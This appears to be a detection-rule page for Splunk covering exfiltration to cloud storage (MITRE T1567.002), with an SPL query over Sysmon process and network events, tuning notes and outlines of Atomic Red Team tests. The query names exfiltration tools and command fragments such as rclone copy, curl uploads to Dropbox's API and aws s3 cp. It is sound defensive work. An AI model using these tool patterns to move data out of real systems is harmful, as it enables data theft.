T1567.002 Splunk · SPL

Detect Exfiltration to Cloud Storage in Splunk

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services such as Dropbox, Google Drive, OneDrive, MEGA, and Amazon S3 allow storage and retrieval of data over the Internet. Exfiltration to these services can blend with legitimate enterprise traffic, providing significant cover. Real-world threat actors including Akira, Leviathan, POLONIUM, LuminousMoth, Mustang Panda, and Kimsuky have all leveraged cloud storage for data theft. Rclone is the most commonly observed tool, used by multiple ransomware and espionage groups to automate bulk transfers to attacker-controlled cloud accounts.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1567 Exfiltration Over Web Service
Sub-technique
T1567.002 Exfiltration to Cloud Storage
Canonical reference
https://attack.mitre.org/techniques/T1567/002/

SPL Detection Query

Splunk (SPL)
spl 
index=wineventlog
(
  (
    sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    (
      Image="*\\rclone.exe" OR Image="*\\azcopy.exe" OR Image="*\\megatools.exe" OR Image="*\\megaput.exe"
      OR
      (
        (Image="*\\curl.exe" OR Image="*\\wget.exe" OR Image="*\\python.exe" OR Image="*\\python3.exe" OR Image="*\\powershell.exe" OR Image="*\\pwsh.exe")
        (CommandLine="*dropbox.com*" OR CommandLine="*dropboxapi.com*" OR CommandLine="*googleapis.com*" OR CommandLine="*graph.microsoft.com*" OR CommandLine="*s3.amazonaws.com*" OR CommandLine="*mega.io*" OR CommandLine="*mega.nz*" OR CommandLine="*onedrive.live.com*" OR CommandLine="*api.box.com*")
        (CommandLine="*-T *" OR CommandLine="*--upload-file*" OR CommandLine="*-X PUT*" OR CommandLine="*-X POST*" OR CommandLine="*--data-binary*" OR CommandLine="*upload*")
      )
      OR
      (
        (Image="*\\rclone.exe" OR Image="*\\azcopy.exe")
        OR (CommandLine="*rclone copy*" OR CommandLine="*rclone sync*" OR CommandLine="*rclone move*" OR CommandLine="*azcopy copy*" OR CommandLine="*azcopy sync*" OR CommandLine="*gsutil cp*" OR CommandLine="*gsutil rsync*" OR CommandLine="*aws s3 cp*" OR CommandLine="*aws s3 sync*")
        OR (CommandLine="*:dropbox*" OR CommandLine="*:gdrive*" OR CommandLine="*:onedrive*" OR CommandLine="*mega:*" OR CommandLine="*:s3*")
      )
    )
  )
  OR
  (
    sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3
    Initiated=true
    (
      DestinationHostname="*dropbox.com" OR DestinationHostname="*dropboxapi.com"
      OR DestinationHostname="*googleapis.com" OR DestinationHostname="*drive.google.com"
      OR DestinationHostname="*graph.microsoft.com" OR DestinationHostname="*onedrive.live.com"
      OR DestinationHostname="*s3.amazonaws.com" OR DestinationHostname="*mega.io"
      OR DestinationHostname="*api.box.com"
    )
    NOT (Image="*\\OneDrive.exe" OR Image="*\\googledrivesync.exe" OR Image="*\\Dropbox.exe" OR Image="*\\GoogleDriveFS.exe")
  )
)
| eval SignalType=case(
    EventCode=1 AND match(Image, "(rclone|azcopy|megaput|megatools)"), "CloudSyncTool",
    EventCode=1 AND match(CommandLine, "(rclone copy|rclone sync|azcopy copy|gsutil cp|aws s3 cp)"), "CloudSyncCommand",
    EventCode=1, "ApiUpload",
    EventCode=3, "CloudStorageNetConn",
    true(), "Unknown"
  )
| eval IsKnownSyncClient=if(match(Image, "(OneDrive\.exe|googledrivesync\.exe|Dropbox\.exe|GoogleDriveFS\.exe|backup|veeam)"), 1, 0)
| where IsKnownSyncClient=0
| table _time, host, User, Image, CommandLine, DestinationHostname, DestinationPort, ParentImage, ParentCommandLine, SignalType
| sort - _time
high severity medium confidence

Detects cloud storage exfiltration via two Sysmon signals: Event ID 1 (Process Create) for rclone, azcopy, and curl/scripting tools uploading to cloud storage APIs, and Event ID 3 (Network Connect) for outbound connections to cloud storage hostnames from non-standard sync client processes. Excludes known legitimate desktop sync clients (OneDrive.exe, Dropbox.exe, GoogleDriveFS.exe). The SignalType field helps analysts quickly categorize the detection vector for triage.

Data Sources

Process: Process CreationNetwork Traffic: Network Connection CreationSysmon Event ID 1Sysmon Event ID 3

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • OneDrive, Google Drive, and Dropbox desktop sync clients — excluded by image name filter but verify the exclusion list matches your environment
  • DevOps CI/CD agents running rclone or azcopy for legitimate artifact management
  • IT-approved backup tools using cloud storage backends — add their process image names to the exclusion filter
  • Developers using AWS CLI or gsutil from personal workstations for legitimate project work
  • Security scanning or SIEM forwarder processes that check cloud storage endpoints for threat intelligence
Download portable Sigma rule (.yml)

Other platforms for T1567.002

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Rclone Exfiltration to Dropbox (Simulated with Local Filesystem Remote)

    Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy' and the source path. A second Event ID 1 for the 'rclone config create' invocation with 'localtest local' arguments. Security Event ID 4688 if command line auditing is enabled.

  2. Test 2curl Upload to Cloud Storage API Endpoint

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'content.dropboxapi.com', '-X POST', and '--data-binary'. Sysmon Event ID 3: Network Connection attempted to content.dropboxapi.com:443. The connection will fail due to invalid token but process and network events are generated.

  3. Test 3PowerShell Upload to OneDrive Graph API

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'graph.microsoft.com', 'Invoke-RestMethod', 'PUT', and 'content'. Sysmon Event ID 3: Network Connection to graph.microsoft.com:443. PowerShell ScriptBlock Log Event ID 4104 with the full upload script.

  4. Test 4Rclone Configuration File Drop and Cloud Remote Enumeration

    Expected signal: Sysmon Event ID 11: File Create for %APPDATA%\rclone\rclone.conf. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'listremotes' and '--config'. Security Event ID 4688 (if enabled) capturing the rclone invocation. The rclone.conf file creation event is a high-fidelity indicator per the hunting query targeting this artifact.

Last updated: 2026-03-13 Research depth: deep
References (12)

Unlock Pro Content

Get the full detection package for T1567.002 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1567Exfiltration Over Web Service

Related Sub-techniques

T1567.001Exfiltration to Code RepositoryT1567.003Exfiltration to Text Storage SitesT1567.004Exfiltration Over Webhook

Related Techniques

T1567Exfiltration Over Web ServiceT1567.001Exfiltration to Code RepositoryT1074.001Local Data StagingT1074.002Remote Data StagingT1560.001Archive via UtilityT1048.002Exfiltration Over Asymmetric Encrypted Non-C2 ProtocolT1020Automated ExfiltrationT1105Ingress Tool TransferT1570Lateral Tool TransferT1078.004Cloud Accounts

Same Tactic: Exfiltration

Popular Detections